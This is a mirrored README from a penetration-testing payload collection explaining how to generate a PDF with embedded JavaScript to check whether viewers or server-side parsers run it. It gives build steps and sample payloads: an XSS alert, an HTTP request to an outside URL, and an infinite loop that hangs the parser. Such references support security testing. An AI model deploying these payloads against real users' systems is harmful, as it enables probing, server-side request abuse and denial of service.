mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-22 04:16:11 +00:00
1.0 KiB
1.0 KiB
Generate PDF File Containing JavaScript Code
PDF may contain JavaScript code. This script allow us to generate a PDF file which helps us to check if that code is executed when the file is opened. Possible targets are client applications trying to open the file or sererside backends which are parsing the PDF file.
HowTo
- Edit the file
poc.js
with the JS code you want to have included in your PDF file - Install the required python modules using
pip install pdfrw
- Create the PDF:
python poc.py poc.js
- Open the file
result.pdf
on your victim's system
Possible exploit codes
The full set of available functions is documented here: https://opensource.adobe.com/dc-acrobat-sdk-docs/library/jsapiref/JS_API_AcroJS.html
XSS (for GUI viewers)
app.alert("XSS");
Open URL
var cURL="http://[REDACTED]/";
var params =
{
cVerb: "GET",
cURL: cURL
};
Net.HTTP.request(params);
Timeout
while (true) {}
References
The code is based on https://github.com/osnr/horrifying-pdf-experiments/